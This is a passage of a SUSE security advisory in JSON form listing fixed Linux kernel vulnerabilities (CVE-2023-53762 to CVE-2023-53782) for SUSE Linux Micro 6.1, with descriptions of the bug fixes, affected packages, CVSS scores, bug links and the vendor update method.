"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53762"
},
{
"cve": "CVE-2023-53766",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53766"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nFS: JFS: Check for read-only mounted filesystem in txBegin\n\n This patch adds a check for read-only mounted filesystem\n in txBegin before starting a transaction potentially saving\n from NULL pointer deref.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53766",
"url": "https://www.suse.com/security/cve/CVE-2023-53766"
},
{
"category": "external",
"summary": "SUSE Bug 1255005 for CVE-2023-53766",
"url": "https://bugzilla.suse.com/1255005"
},
{
"category": "external",
"summary": "SUSE Bug 1255006 for CVE-2023-53766",
"url": "https://bugzilla.suse.com/1255006"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2023-53766"
},
{
"cve": "CVE-2023-53768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregmap-irq: Fix out-of-bounds access when allocating config buffers\n\nWhen allocating the 2D array for handling IRQ type registers in\nregmap_add_irq_chip_fwnode(), the intent is to allocate a matrix\nwith num_config_bases rows and num_config_regs columns.\n\nThis is currently handled by allocating a buffer to hold a pointer for\neach row (i.e. num_config_bases). After that, the logic attempts to\nallocate the memory required to hold the register configuration for\neach row. However, instead of doing this allocation for each row\n(i.e. num_config_bases allocations), the logic erroneously does this\nallocation num_config_regs number of times.\n\nThis scenario can lead to out-of-bounds accesses when num_config_regs\nis greater than num_config_bases. Fix this by updating the terminating\ncondition of the loop that allocates the memory for holding the register\nconfiguration to allocate memory only for each row in the matrix.\n\nAmit Pundir reported a crash that was occurring on his db845c device\ndue to memory corruption (see \"Closes\" tag for Amit\u0027s report). The KASAN\nreport below helped narrow it down to this issue:\n\n[ 14.033877][ T1] ==================================================================\n[ 14.042507][ T1] BUG: KASAN: invalid-access in regmap_add_irq_chip_fwnode+0x594/0x1364\n[ 14.050796][ T1] Write of size 8 at addr 06ffff8081021850 by task init/1\n\n[ 14.242004][ T1] The buggy address belongs to the object at ffffff8081021850\n[ 14.242004][ T1] which belongs to the cache kmalloc-8 of size 8\n[ 14.255669][ T1] The buggy address is located 0 bytes inside of\n[ 14.255669][ T1] 8-byte region [ffffff8081021850, ffffff8081021858)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53768",
"url": "https://www.suse.com/security/cve/CVE-2023-53768"
},
{
"category": "external",
"summary": "SUSE Bug 1254599 for CVE-2023-53768",
"url": "https://bugzilla.suse.com/1254599"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53768"
},
{
"cve": "CVE-2023-53777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: kill hooked chains to avoid loops on deduplicated compressed images\n\nAfter heavily stressing EROFS with several images which include a\nhand-crafted image of repeated patterns for more than 46 days, I found\ntwo chains could be linked with each other almost simultaneously and\nform a loop so that the entire loop won\u0027t be submitted. As a\nconsequence, the corresponding file pages will remain locked forever.\n\nIt can be _only_ observed on data-deduplicated compressed images.\nFor example, consider two chains with five pclusters in total:\n\tChain 1: 2-\u003e3-\u003e4-\u003e5 -- The tail pcluster is 5;\n Chain 2: 5-\u003e1-\u003e2 -- The tail pcluster is 2.\n\nChain 2 could link to Chain 1 with pcluster 5; and Chain 1 could link\nto Chain 2 at the same time with pcluster 2.\n\nSince hooked chains are all linked locklessly now, I have no idea how\nto simply avoid the race. Instead, let\u0027s avoid hooked chains completely\nuntil I could work out a proper way to fix this and end users finally\ntell us that it\u0027s needed to add it back.\n\nActually, this optimization can be found with multi-threaded workloads\n(especially even more often on deduplicated compressed images), yet I\u0027m\nnot sure about the overall system impacts of not having this compared\nwith implementation complexity.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53777",
"url": "https://www.suse.com/security/cve/CVE-2023-53777"
},
{
"category": "external",
"summary": "SUSE Bug 1254749 for CVE-2023-53777",
"url": "https://bugzilla.suse.com/1254749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53777"
},
{
"cve": "CVE-2023-53778",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53778"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/qaic: Clean up integer overflow checking in map_user_pages()\n\nThe encode_dma() function has some validation on in_trans-\u003esize but it\nwould be more clear to move those checks to find_and_map_user_pages().\n\nThe encode_dma() had two checks:\n\n\tif (in_trans-\u003eaddr + in_trans-\u003esize \u003c in_trans-\u003eaddr || !in_trans-\u003esize)\n\t\treturn -EINVAL;\n\nThe in_trans-\u003eaddr variable is the starting address. The in_trans-\u003esize\nvariable is the total size of the transfer. The transfer can occur in\nparts and the resources-\u003exferred_dma_size tracks how many bytes we have\nalready transferred.\n\nThis patch introduces a new variable \"remaining\" which represents the\namount we want to transfer (in_trans-\u003esize) minus the amount we have\nalready transferred (resources-\u003exferred_dma_size).\n\nI have modified the check for if in_trans-\u003esize is zero to instead check\nif in_trans-\u003esize is less than resources-\u003exferred_dma_size. If we have\nalready transferred more bytes than in_trans-\u003esize then there are negative\nbytes remaining which doesn\u0027t make sense. If there are zero bytes\nremaining to be copied, just return success.\n\nThe check in encode_dma() checked that \"addr + size\" could not overflow\nand barring a driver bug that should work, but it\u0027s easier to check if\nwe do this in parts. First check that \"in_trans-\u003eaddr +\nresources-\u003exferred_dma_size\" is safe. Then check that \"xfer_start_addr +\nremaining\" is safe.\n\nMy final concern was that we are dealing with u64 values but on 32bit\nsystems the kmalloc() function will truncate the sizes to 32 bits. So\nI calculated \"total = in_trans-\u003esize + offset_in_page(xfer_start_addr);\"\nand returned -EINVAL if it were \u003e= SIZE_MAX. This will not affect 64bit\nsystems.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53778",
"url": "https://www.suse.com/security/cve/CVE-2023-53778"
},
{
"category": "external",
"summary": "SUSE Bug 1254761 for CVE-2023-53778",
"url": "https://bugzilla.suse.com/1254761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53778"
},
{
"cve": "CVE-2023-53782",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53782"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndccp: Fix out of bounds access in DCCP error handler\n\nThere was a previous attempt to fix an out-of-bounds access in the DCCP\nerror handlers, but that fix assumed that the error handlers only want\nto access the first 8 bytes of the DCCP header. Actually, they also look\nat the DCCP sequence number, which is stored beyond 8 bytes, so an\nexplicit pskb_may_pull() is required.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53782",
"url": "https://www.suse.com/security/cve/CVE-2023-53782"
},
{
"category": "external",
"summary": "SUSE Bug 1254758 for CVE-2023-53782",
"url": "https://bugzilla.suse.com/1254758"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
